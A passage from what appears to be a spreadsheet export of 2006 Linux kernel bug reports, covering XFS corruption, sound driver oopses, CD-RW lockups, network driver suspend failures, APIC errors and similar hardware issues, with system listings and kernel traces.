xfs_repair straight away. I had to use xfs_repair -L to force log zeroing. It reported tons of stuff. Unfortunately I did not log it to a file. Debian linux booted again upto KDE 3.5 nicely. I tried to repair it, finally giving up due to about 200 MB of stuff in lost+found. I restored a backup from my externel USB harddisk via rsync. This was yesterday. I updated my system from 2.6.15.6 to 2.6.16.4, before I had 2.6.16.1 in use and the third crash happened. martin@deepdance:~ -&gt; dpkg -l | grep kdissert ii kdissert 1.0.5.debian-3 mindmapping tool (I doubt its related to kdissert) 3) Today XFS got corrupted again. I had extensive apt-get updating running to make up for the 3 weeks since the last backup I restored and it also installed a new koffice version (release 1.5). I wanted to try out kword, it crashed straight away. I tried from console: bash told me "error while starting the executable". I did apt-get --reinstall install kword - then it worked. Ok, once again OpenSUSE 10 and xfs_check. Errors again. Quite a few. This time I made a log file. Then xfs_repair, also with log file. I attach those two to this bug report. One thing that I found was that at least with 2) and 3) I had an empty file /core in that corrupted XFS filesystem. I thought about the possibility of a kernel crash that overwrote XFS in-memory datastructures, but I learned, that the Linux kernel itself usually does not core dump to the filesystem. On occasion 3 I made sure as I compiled 2.6.16.4 that I disable core dumping for ELF files. I still got that empty /core in the corrupted Debian root filesystem. Steps to reproduce: I am not really interested to reproduce this ;-). Well I have no idea. Probably use similar kernel, similar hardware and try to use that system productively for a while. I have not had any XFS corruption during my usage of the various 2.6.15 kernels I had in use. This bug report is probably related to: #6180 I will revert to 2.6.15.6 for now or even compile 2.6.15.7 as I can not afford the time to restore my Debian system from scratch once again. I will however restore it from the backup once again to make absolutely sure that it is consistent. I know I probably won't be of much help debugging this, but I just don't have the resources to do fs debugging with my laptop that is in heavy productive use and at least at home I have no spare system either. I may try again with 2.6.17 as soon as I am convinced that its stable enough.</t>
  </si>
  <si>
    <t>capi20 is not created anymore</t>
  </si>
  <si>
    <t>2.6.17-rc1-git5</t>
  </si>
  <si>
    <t>2006-04-13 02:22 UTC</t>
  </si>
  <si>
    <t>Tobias Powalowski</t>
  </si>
  <si>
    <t>2006-05-26 01:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17-rc1 or 2.6.16.5 Distribution: Archlinux Hardware Environment: Linux Wohnung 2.6.17-rc1-ARCH #1 SMP PREEMPT Wed Apr 12 21:47:19 CEST 2006 i686 AMD Athlon(TM) XP 2200+ AuthenticAMD GNU/Linux Software Environment: Problem Description: the /dev/capi20 device is not created anymore, when loading modprobe capi Steps to reproduce: modprobe capi only /dev/capi/0-x is created</t>
  </si>
  <si>
    <t>powermac/low_i2c.c: keywest i2c IRQ failure</t>
  </si>
  <si>
    <t>2006-04-13 22:45 UTC</t>
  </si>
  <si>
    <t>Timothy Stotts</t>
  </si>
  <si>
    <t>2006-11-16 14:45 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15.x Distribution: Gentoo, with vanilla kernel Hardware Environment: Powerbook5,2 1.25Ghz (1st-gen Albook 15'' ADB keyboard) Software Environment: runlevel 1 console Problem Description: keywest I2C bus driver prints IRQ errors to kernel log when accessed by user-space software Steps to reproduce: (1) boot into 2.6.16.x kernel (all 2.6.16.x affected) (2) load i2c modules if applicable not compiled-in (i2c-dev, i2c-powermac, etc.) (3) scan all /dev/i2c-X with initialization of pbbuttonsd, looking for ambient light sensors and keyboard backlight control (4) access of keywest i2c devices produces kernel error messages. sample messages: KW: wrong state. Got KW_I2C_IRQ_ADDR, state: state_stop (isr: 02) KW: wrong state. Got KW_I2C_IRQ_ADDR, state: state_stop (isr: 02) KW: wrong state. Got KW_I2C_IRQ_STOP, state: state_read (isr: 04) Diagnosis: - first time for keywest failure on this system since near 2.6.9 - identical results if entire I2C subsystem as modules or all compiled-in - source: arch/powerpc/platforms/powermac/low_i2c.c - probably a bug in Ben's driver rewrite of Keywest into low-level code - other I2C code in kernel: ATI Radeon framebuffer, laptop thermal (?)</t>
  </si>
  <si>
    <t>snd_hda_intel is oopsing on Asus A8N-VM CSM onboard chipset</t>
  </si>
  <si>
    <t>2006-04-14 07:47 UTC</t>
  </si>
  <si>
    <t>Michael Scherer</t>
  </si>
  <si>
    <t>2006-05-22 05:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: the card was not working before Distribution: Mandriva cooker Hardware Environment: this is a Asus A8N-VM CSM mother board, with a onboard sound chipset ( ADI AD1986A ), and a pci sound card ( sb 128 ), that i do not use at the moment. $ cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 15 model : 31 model name : AMD Athlon(tm) 64 Processor 3200+ stepping : 0 cpu MHz : 1000.000 cache size : 512 KB fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt lm 3dnowext 3dnow lahf_lm bogomips : 2012.70 TLB size : 1024 4K pages clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical, 48 bits virtual power management: ts fid vid ttp $ lspci 00:00.0 RAM memory: nVidia Corporation C51 Host Bridge (rev a2) 00:00.1 RAM memory: nVidia Corporation C51 Memory Controller 0 (rev a2) 00:00.2 RAM memory: nVidia Corporation C51 Memory Controller 1 (rev a2) 00:00.3 RAM memory: nVidia Corporation C51 Memory Controller 5 (rev a2) 00:00.4 RAM memory: nVidia Corporation C51 Memory Controller 4 (rev a2) 00:00.5 RAM memory: nVidia Corporation C51 Host Bridge (rev a2) 00:00.6 RAM memory: nVidia Corporation C51 Memory Controller 3 (rev a2) 00:00.7 RAM memory: nVidia Corporation C51 Memory Controller 2 (rev a2) 00:02.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) 00:03.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) 00:04.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) 00:05.0 VGA compatible controller: nVidia Corporation C51 PCI Express Bridge (rev a2) 00:09.0 RAM memory: nVidia Corporation MCP51 Host Bridge (rev a2) 00:0a.0 ISA bridge: nVidia Corporation MCP51 LPC Bridge (rev a2) 00:0a.1 SMBus: nVidia Corporation MCP51 SMBus (rev a2) 00:0b.0 USB Controller: nVidia Corporation MCP51 USB Controller (rev a2) 00:0b.1 USB Controller: nVidia Corporation MCP51 USB Controller (rev a2) 00:0d.0 IDE interface: nVidia Corporation MCP51 IDE (rev a1) 00:0e.0 IDE interface: nVidia Corporation MCP51 Serial ATA Controller (rev a1) 00:0f.0 IDE interface: nVidia Corporation MCP51 Serial ATA Controller (rev a1) 00:10.0 PCI bridge: nVidia Corporation MCP51 PCI Bridge (rev a2) 00:10.1 Class 0403: nVidia Corporation MCP51 High Definition Audio (rev a2) 00:14.0 Bridge: nVidia Corporation MCP51 Ethernet Controller (rev a1) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 04:05.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 80) 04:08.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 0c) 04:09.0 Multimedia audio controller: Ensoniq 5880 AudioPCI (rev 02) there is two cards, even if this is not directly apparent. The first is on the motherboard, and didn't work until now, the other one is a old pci card that i used until one week ago. I never had any problem with the pci card. Software Environment: $ cat /proc/version Linux version 2.6.17-rc1.16mdk (lcapitulino@deborah.mandriva.com) (gcc version 4.0.3 (4.0.3-1mdk for Mandriva Linux release 2006.1)) #1 Mon Apr 3 21:11:23 CEST 2006 This is a automated rebuild form kernel.org sources, without patch. $ lsmod Module Size Used by ipv6 253376 16 snd_seq_dummy 3716 0 snd_seq_oss 33508 0 snd_seq_midi_event 7552 1 snd_seq_oss snd_seq 53912 5 snd_seq_dummy,snd_seq_oss,snd_seq_midi_event eepro100 30608 0 mii 5760 1 eepro100 snd_ens1371 24896 0 gameport 13200 1 snd_ens1371 snd_rawmidi 22816 1 snd_ens1371 snd_seq_device 8208 4 snd_seq_dummy,snd_seq_oss,snd_seq,snd_rawmidi snd_ac97_codec 109884 1 snd_ens1371 snd_ac97_bus 2816 1 snd_ac97_codec snd_pcm_oss 41376 0 snd_mixer_oss 16384 1 snd_pcm_oss forcedeth 27788 0 af_packet 18316 2 snd_hda_intel 16032 2 snd_hda_codec 171720 1 snd_hda_intel snd_pcm 86284 6 snd_ens1371,snd_ac97_codec,snd_pcm_oss,snd_hda_intel,snd_hda_codec snd_timer 21384 2 snd_seq,snd_pcm snd_page_alloc 8720 2 snd_hda_intel,snd_pcm snd 54784 15 snd_seq_oss,snd_seq,snd_ens1371,snd_rawmidi,snd_seq_device,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_hda_intel,snd_hda_codec,snd_pcm,snd_timer soundcore 8992 1 snd floppy 62272 0 cpufreq_ondemand 6828 0 cpufreq_conservative 7620 0 cpufreq_powersave 2176 0 powernow_k8 9608 0 freq_table 4360 1 powernow_k8 processor 22616 1 powernow_k8 ide_cd 38688 0 binfmt_misc 10256 1 loop 13456 0 sata_nv 8580 0 libata 65432 1 sata_nv scsi_mod 138392 1 libata capability 4616 0 commoncap 6912 1 capability pcspkr 3200 0 usbmouse 5376 0 usbhid 49184 0 ohci1394 30920 0 ieee1394 351992 1 ohci1394 ehci_hcd 30344 0 ohci_hcd 19332 0 usbcore 127284 5 usbmouse,usbhid,ehci_hcd,ohci_hcd reiserfs 246008 3 Problem Description: This message appear in dmesg when i run totem-xine to play a mp3 : Unable to handle kernel NULL pointer dereference at 0000000000000100 RIP: &lt;ffffffff8817b6b6&gt;{:snd_pcm:snd_pcm_mmap_data_close+18} PGD 0 Oops: 0002 [1] CPU 0 Modules linked in: ipv6 snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq eepro100 mii snd_ens1371 gameport snd_rawmidi snd_seq_device snd_ac97_codec snd_ac97_bus snd_pcm_oss snd_mixer_oss forcedeth af_packet snd_hda_intel snd_hda_codec snd_pcm snd_timer snd_page_alloc snd soundcore floppy cpufreq_ondemand cpufreq_conservative cpufreq_powersave powernow_k8 freq_table processor ide_cd binfmt_misc loop sata_nv libata scsi_mod capability commoncap pcspkr usbmouse usbhid ohci1394 ieee1394 ehci_hcd ohci_hcd usbcore reiserfs Pid: 4053, comm: totem-xine Not tainted 2.6.17-rc1.16mdk #1 RIP: 0010:[&lt;ffffffff8817b6b6&gt;] &lt;ffffffff8817b6b6&gt;{:snd_pcm:snd_pcm_mmap_data_close+18} RSP: 0018:ffff8100227cbe38 EFLAGS: 00010282 RAX: 0000000000000000 RBX: ffff81002c58b3e8 RCX: 0000000000000000 RDX: 000000000000001a RSI: 0000000000000000 RDI: ffff81002c58b3e8 RBP: ffff8100227cbe38 R08: 0000000000000000 R09: ffff81002c58baf0 R10: 00002b3c21758b60 R11: ffff8100227cbdb8 R12: ffff81002c58b578 R13: ffff81002c3bb330 R14: 0000000000000001 R15: 0000000000000000 FS: 00002b3c21758b60(0000) GS:ffffffff805b5000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000000000000100 CR3: 0000000017631000 CR4: 00000000000006e0 Process totem-xine (pid: 4053, threadinfo ffff8100227ca000, task ffff8100258c5040) Stack: ffff8100227cbe58 ffffffff80256a2d ffff8100227cbe78 ffff81002c58b3e8 ffff8100227cbe98 ffffffff80256f0a ffff810039a4ceb8 0000000000001e0a ffffffff8055cb60 ffff81002c3bb330 Call Trace: &lt;ffffffff80256a2d&gt;{remove_vma+37} &lt;ffffffff80256f0a&gt;{exit_mmap+176} &lt;ffffffff80222eb9&gt;{mmput+32} &lt;ffffffff802264a3&gt;{exit_mm+191} &lt;ffffffff80227395&gt;{do_exit+590} &lt;ffffffff802279c6&gt;{sys_exit_group+0} &lt;ffffffff802279d8&gt;{sys_exit_group+18} &lt;ffffffff80209456&gt;{system_call+126} Code: ff 88 00 01 00 00 c9 c3 55 ba 20 01 00 00 48 89 e5 41 56 49 RIP &lt;ffffffff8817b6b6&gt;{:snd_pcm:snd_pcm_mmap_data_close+18} RSP &lt;ffff8100227cbe38&gt; CR2: 0000000000000100 &lt;1&gt;Fixing recursive fault but reboot is needed! I have also experienced numerous lock each time related to sound card ( ie when playing, when stopping the music, or when changing the volume ) since i run 2.6.17rc1 and use the onboard sound chipset. It was not working previously. Trying to replay the same mp3 now freeze totem, and give another backtrace : general protection fault: 0000 [2] CPU 0 Modules linked in: ipv6 snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq eep ro100 mii snd_ens1371 gameport snd_rawmidi snd_seq_device snd_ac97_codec snd_ac9 7_bus snd_pcm_oss snd_mixer_oss forcedeth af_packet snd_hda_intel snd_hda_codec snd_pcm snd_timer snd_page_alloc snd soundcore floppy cpufreq_ondemand cpufreq_c onservative cpufreq_powersave powernow_k8 freq_table processor ide_cd binfmt_mis c loop sata_nv libata scsi_mod capability commoncap pcspkr usbmouse usbhid ohci1 394 ieee1394 ehci_hcd ohci_hcd usbcore reiserfs Pid: 4359, comm: totem-xine Not tainted 2.6.17-rc1.16mdk #1 RIP: 0010:[&lt;ffffffff8817d0b5&gt;] &lt;ffffffff8817d0b5&gt;{:snd_pcm:snd_pcm_sw_params+10} RSP: 0018:ffff810015afbcc8 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff810015afbd08 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffff810015afbd08 RDI: 6b6b6b6b6b6b6b6b RBP: ffff810015afbcd8 R08: ffff8100258ded78 R09: 0000000000000004 R10: ffffffffffffffff R11: 0000000000000246 R12: 6b6b6b6b6b6b6b6b R13: 00007fff470f3880 R14: 6b6b6b6b6b6b6b6b R15: 000000000000001b FS: 00002ac969138b60(0000) GS:ffffffff805b5000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 00002ac964c240a3 CR3: 000000000fbe7000 CR4: 00000000000006e0 Process totem-xine (pid: 4359, threadinfo ffff810015afa000, task ffff81001e018b4 0) Stack: ffff810015afbd08 00007fff470f3880 ffff810015afbe68 ffffffff8817eaa9 00000000000000d0 0000000000000246 0000000000000000 ffff81003952b510 0000000100000000 0000000000000000 Call Trace: &lt;ffffffff8817eaa9&gt;{:snd_pcm:snd_pcm_common_ioctl1+702} &lt;ffffffff8025a525&gt;{page_add_file_rmap+29} &lt;ffffffff802d07c9&gt;{prio_tree_in sert+374} &lt;ffffffff8817f7d2&gt;{:snd_pcm:snd_pcm_playback_ioctl1+492} &lt;ffffffff80258c21&gt;{do_mmap_pgoff+1556} &lt;ffffffff8817f815&gt;{:snd_pcm:snd_pc m_playback_ioctl+38} &lt;ffffffff80277eef&gt;{do_ioctl+27} &lt;ffffffff80278156&gt;{vfs_ioctl+562} &lt;ffffffff802781ca&gt;{sys_ioctl+95} &lt;ffffffff80209456&gt;{system_call+126} Code: 48 8b 9f 90 00 00 00 fa 48 8b 83 f0 00 00 00 8b 00 85 c0 75 RIP &lt;ffffffff8817d0b5&gt;{:snd_pcm:snd_pcm_sw_params+10} RSP &lt;ffff810015afbcc8&gt;</t>
  </si>
  <si>
    <t>killed by RICOH CD-R/RW MP7083A</t>
  </si>
  <si>
    <t>2006-04-15 03:13 UTC</t>
  </si>
  <si>
    <t>2007-10-31 02:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.4.27 Distribution: Debian woody/sarge/etch Hardware Environment: Model=RICOH CD-R/RW MP7083A, FwRev=1.20, SerialNo= and (one of the systems where I tried this, another one had a BX board and no TV card) 0000:00:00.0 Host bridge: Intel Corp. 82810 GMCH [Graphics Memory Controller Hub] (rev 02) 0000:00:01.0 VGA compatible controller: Intel Corp. 82810 CGC [Chipset Graphics Controller] (rev 02) 0000:00:1e.0 PCI bridge: Intel Corp. 82801AA PCI Bridge (rev 02) 0000:00:1f.0 ISA bridge: Intel Corp. 82801AA ISA Bridge (LPC) (rev 02) 0000:00:1f.1 IDE interface: Intel Corp. 82801AA IDE (rev 02) 0000:00:1f.2 USB Controller: Intel Corp. 82801AA USB (rev 02) 0000:00:1f.3 SMBus: Intel Corp. 82801AA SMBus (rev 02) 0000:01:07.0 Multimedia audio controller: Ensoniq ES1371 [AudioPCI-97] (rev 06) 0000:01:08.0 Ethernet controller: VIA Technologies, Inc. VT6105 [Rhine-III] (rev 86) 0000:01:0b.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) 0000:01:0b.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) Software Environment: linux cdrdao or cdrecord or cdparanoia Problem Description: Normal CD-ROM accesses work perfectly, in DMA mode or not. Everything else (audio extraction, burning (audio?) CDs) locks the system hard, even the ATX front-power-switch doesn't work any more. This even happens in PIO modes. I had no problem with this drive with 2.2 and 2.4 kernels, but it happens with every 2.6 kernel I tried this with, at least the debian provided 2.6.8.x and some self-made (from kernel.org sources) 2.6.8, 2.6.9, 2.6.10, 2.6.11, 2.6.12, and debian-s 2.6.15 again. Googling around brought no explanation; in some older versions of the IDE driver there seems to be a workaround (switching off UDMA modes?) for this drive, which got removed as 'bogus' later on. Is there some secret information? Steps to reproduce: cdparanoia -B &lt;system is completely dead&gt;</t>
  </si>
  <si>
    <t>recognises ext3 partition as lvm2</t>
  </si>
  <si>
    <t>klibc/kinit</t>
  </si>
  <si>
    <t>1.3.3</t>
  </si>
  <si>
    <t>forcedeth broken powermanagement/irq handling ?</t>
  </si>
  <si>
    <t>2006-04-17 02:15 UTC</t>
  </si>
  <si>
    <t>2007-01-01 14:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Fedora Core 5 Hardware Environment: 00:00.0 Memory controller: nVidia Corporation CK804 Memory Controller (rev a3) 00:01.0 ISA bridge: nVidia Corporation CK804 ISA Bridge (rev a3) 00:01.1 SMBus: nVidia Corporation CK804 SMBus (rev a2) 00:02.0 USB Controller: nVidia Corporation CK804 USB Controller (rev a2) 00:02.1 USB Controller: nVidia Corporation CK804 USB Controller (rev a3) 00:06.0 IDE interface: nVidia Corporation CK804 IDE (rev a2) 00:08.0 IDE interface: nVidia Corporation CK804 Serial ATA Controller (rev a3) 00:09.0 PCI bridge: nVidia Corporation CK804 PCI Bridge (rev a2) 00:0a.0 Bridge: nVidia Corporation CK804 Ethernet Controller (rev a3) 00:0b.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) 00:0c.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) 00:0d.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) 00:0e.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 01:09.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 80) 01:0a.0 Ethernet controller: Marvell Technology Group Ltd. 88E8001 Gigabit Ethernet Controller (rev 13) 01:0b.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 0a) 01:0b.1 Input device controller: Creative Labs SB Live! MIDI/Game Port (rev 0a) 05:00.0 VGA compatible controller: nVidia Corporation GeForce 7800 GTX (rev a1) Software Environment: Problem Description: I am runnig a 2.6.16.1 kernel on a DFI LP NF4 SLI-DR Expert mobo, which has an nvidia chipset with onboard nic. The nic works fine with the forcedeth driver, perfomance is ok (good). The system is a x86_64 FC5 install on a dual core opteron 170 cpu with 2GB (2x1GB in dual channel) of Ram installed. When I suspend the machine using ACPI S3 or swsup and resume it the network is dead. I cannot recive an packages. ifdown / ifup does not help. Restarting the network using /sbin/service network restart also does not get network working. Unloading and loading the driver (modprobe -r forcedeth;modprobe forcedeth) has the same result-&gt; dead network. I have to reboot in order to get the network working again. I have a static IP so no dhcp issue. This makes suspend useles on my box, because I have to reboot anyway to get my network working. What could be causing this? If there is any info that I can provide to help fixing this bug tell me. I also noticed this (don't know if it is related or not but doubt it): cat /proc/interrupts CPU0 CPU1 0: 640968 628532 IO-APIC-edge timer 1: 4763 4745 IO-APIC-edge i8042 8: 0 0 IO-APIC-edge rtc 9: 0 0 IO-APIC-level acpi 14: 1552 1082 IO-APIC-edge ide0 15: 44443 44261 IO-APIC-edge ide1 16: 57625 44633 IO-APIC-level libata 17: 972904 0 IO-APIC-level eth0 Steps to reproduce: suspend or hibernate resume try to do anything with the onbaord nic. I mailed this to lkml but got no reply so I filled it as a bug.</t>
  </si>
  <si>
    <t>SiS 661: APIC error on CPU0: 40(40)</t>
  </si>
  <si>
    <t>2006-04-18 04:57 UTC</t>
  </si>
  <si>
    <t>Emmanuel Fleury</t>
  </si>
  <si>
    <t>2012-05-12 01:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16 Distribution: Debian (but home compiled kernel) Hardware Environment: lspci -tv: -[00]-+-00.0 Silicon Integrated Systems [SiS] 661FX/M661FX/M661MX Host +-01.0-[01]--+-00.0 ATI Technologies Inc RV350 AQ [Radeon 9600] | \-00.1 ATI Technologies Inc RV350 AQ [Radeon 9600] (Secondary) +-02.0 Silicon Integrated Systems [SiS] SiS963 [MuTIOL Media IO] +-02.5 Silicon Integrated Systems [SiS] 5513 [IDE] +-02.7 Silicon Integrated Systems [SiS] Sound Controller +-03.0 Silicon Integrated Systems [SiS] USB 1.0 Controller +-03.1 Silicon Integrated Systems [SiS] USB 1.0 Controller +-03.3 Silicon Integrated Systems [SiS] USB 2.0 Controller +-04.0 Silicon Integrated Systems [SiS] SiS900 PCI Fast Ethernet \-08.0 Intel Corporation 82541PI Gigabit Ethernet Controller /proc/cpuinfo: processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 4 model name : Intel(R) Pentium(R) 4 CPU 3.00GHz stepping : 1 cpu MHz : 3002.629 cache size : 1024 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe constant_tsc pni monitor ds_cpl cid xtpr bogomips : 6007.05 processor : 1 vendor_id : GenuineIntel cpu family : 15 model : 4 model name : Intel(R) Pentium(R) 4 CPU 3.00GHz stepping : 1 cpu MHz : 3002.629 cache size : 1024 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe constant_tsc pni monitor ds_cpl cid xtpr bogomips : 6000.91 Software Environment: Problem Description: The kernel.log contain many APIC error: Apr 14 17:04:41 carioca kernel: APIC error on CPU0: 40(40) Apr 14 17:04:59 carioca kernel: APIC error on CPU0: 40(40) Apr 14 17:33:15 carioca kernel: APIC error on CPU0: 40(40) Apr 14 17:34:38 carioca kernel: APIC error on CPU0: 40(40) Apr 14 17:34:54 carioca kernel: APIC error on CPU0: 40(40) Apr 14 17:36:50 carioca last message repeated 2 times Apr 14 17:40:23 carioca kernel: APIC error on CPU0: 40(40) Apr 14 17:40:42 carioca kernel: APIC error on CPU0: 40(40) Apr 14 17:44:45 carioca kernel: APIC error on CPU0: 40(40) Apr 14 17:46:59 carioca kernel: APIC error on CPU0: 40(40) Apr 14 17:52:29 carioca kernel: APIC error on CPU0: 40(40) Apr 14 17:58:43 carioca kernel: APIC error on CPU0: 40(40) Apr 14 18:02:44 carioca kernel: APIC error on CPU0: 40(40) Apr 14 18:09:00 carioca kernel: APIC error on CPU0: 40(40) Apr 14 18:09:16 carioca kernel: APIC error on CPU0: 40(40) Apr 14 18:10:25 carioca kernel: APIC error on CPU0: 40(40) As described in the kernel code: 40 = 32+8 = 2^5 + 2^3 meaning: - Receive accept error - Send illegal vector Steps to reproduce: I have no idea yet... I am monitoring the /var/log/kernel.log file to see when this occurs (I noticed that the error occurs when I'm using my computer).</t>
  </si>
  <si>
    <t>VIA: irq 201: nobody cared on ethernet via_rhine - VIA PT894/VT8237 and Fast clock issues and Lost timer tick(s)!</t>
  </si>
  <si>
    <t>2.6.18 vanila</t>
  </si>
  <si>
    <t>2006-04-20 16:23 UTC</t>
  </si>
  <si>
    <t>Sérgio M Basto</t>
  </si>
  <si>
    <t>2007-05-14 17:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16-1.2080_FC5.x86_64 Distribution: FC5 Hardware Environment: Intel(R) Pentium(R) D CPU 2.80GHz (64bits) Software Environment: Problem Description: nic goes down Steps to reproduce: after a while of computer idle irq 18: nobody cared (try booting with the "irqpoll" option) Call Trace: &lt;IRQ&gt; &lt;ffffffff8015a8c4&gt;{__report_bad_irq+48} &lt;ffffffff8015aac2&gt;{note_interrupt+433} &lt;ffffffff8015a388&gt;{__do_IRQ+191} &lt;ffffffff8010ce0d&gt;{do_IRQ+59} &lt;ffffffff8010ad72&gt;{ret_from_intr+0} &lt;ffffffff801377f6&gt;{__do_softirq+74} &lt;ffffffff8010bc36&gt;{call_softirq+30} &lt;ffffffff8010cb74&gt;{do_softirq+44} &lt;ffffffff8010ce12&gt;{do_IRQ+64} &lt;ffffffff8010989f&gt;{mwait_idle+0} &lt;ffffffff8010ad72&gt;{ret_from_intr+0} &lt;EOI&gt; &lt;ffffffff8010989f&gt;{mwait_idle+0} &lt;ffffffff80339b56&gt;{thread_return+0} &lt;ffffffff801098d5&gt;{mwait_idle+54} &lt;ffffffff8010987c&gt;{cpu_idle+151} &lt;ffffffff8053a81b&gt;{start_kernel+470} &lt;ffffffff8053a298&gt;{_sinittext+664} handlers: [&lt;ffffffff880afb53&gt;] (rhine_interrupt+0x0/0xb0e [via_rhine]) Disabling IRQ #18</t>
  </si>
  <si>
    <t>(patch queued) aic79xx: SI unit name shown incorrectly</t>
  </si>
  <si>
    <t>2.6.16.9</t>
  </si>
  <si>
    <t>2006-04-21 05:52 UTC</t>
  </si>
  <si>
    <t>Andrew Benham</t>
  </si>
  <si>
    <t>2008-12-01 09:20 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Been like this 'for ever' drivers/scsi/aic7xxx/aic79xx_pci.c Lines 220 - 223. The SI unit is 'Hertz', abbreviation is 'Hz' NOT 'hz'. Change 'Mhz' to 'MHz', 4 places. This will correct the informative text printed at boot. drivers/scsi/aic7xxx/aic79xx_core.c line 3285 has the same problem in a comment, this is not user-visible - but while we're changing the above fault...</t>
  </si>
  <si>
    <t>Laurent Bigonville</t>
  </si>
  <si>
    <t>Zerocool</t>
  </si>
  <si>
    <t>PS/2 mouse don't work properly after detach/attach</t>
  </si>
  <si>
    <t>2006-04-25 12:12 UTC</t>
  </si>
  <si>
    <t>paapaa125</t>
  </si>
  <si>
    <t>2006-05-01 15:46 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15.6 Distribution: Gentoo Hardware Environment: x86 Software Environment: Problem Description: My PS/2 mouse (Logitech MX500) has 8 buttons. If I remove it from the computer and plug it back, I lose the functionality of all the buttons above 3. Only buttons 1-3 remain functional. 2.6.17_rc2 also does this. Kernel 2.6.15.6 and earlier didn't behave like this: all the buttons remained totally functional after detaching and attaching the mouse. The question is: should the user expect a PS/2 mouse to work properly after deatching/attaching it (and why this behaviour changed in 2.6.16 kernel)? If not, then this is not a bug. Steps to reproduce: 1. Remove the PS/2 mouse connector from the computer. 2. Connect the PS/2 mouse back to the computer.</t>
  </si>
  <si>
    <t>Can not disassemble/compile DSDT - external methods invoked - Toshiba Tecra S3</t>
  </si>
  <si>
    <t>2.6.15-20-686 #1 SMP PREEMPT Tue Apr 4 18:37:00 UTC 2006 i686 GN</t>
  </si>
  <si>
    <t>2006-04-25 13:31 UTC</t>
  </si>
  <si>
    <t>Ivan Gracia</t>
  </si>
  <si>
    <t>Distribution: Ubuntu Dapper Beta Hardware Environment: Intel</t>
  </si>
  <si>
    <t>first ACCESS.bus port not working on WRAP board (io 0x840)</t>
  </si>
  <si>
    <t>2006-04-26 05:39 UTC</t>
  </si>
  <si>
    <t>Alexander Krause</t>
  </si>
  <si>
    <t>2006-07-23 05:59 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: * WRAP.1E-1 (http://www.pcengines.ch/wrap.htm) * uses a AMD Geode SC1100 CPU with 2 ACCESS.bus ports Software Environment: * no udev and devfs, created the device-nodes by hand * all i2c stuff compiled into the kernel * the intigrated lm77 (on bus 2) works Problem Description: the scx200_i2c module failed to find the bus on 0x840 (message: 'probe failed' on startup), the second on 0x820 works but produces crap in /proc/ioports ('0820-0827 : z</t>
  </si>
  <si>
    <t>i2c_i801 breaks suspend-to-mem (at least on a 82801DB)</t>
  </si>
  <si>
    <t>2.6.20.1</t>
  </si>
  <si>
    <t>2006-04-26 23:16 UTC</t>
  </si>
  <si>
    <t>Tommi Kyntola</t>
  </si>
  <si>
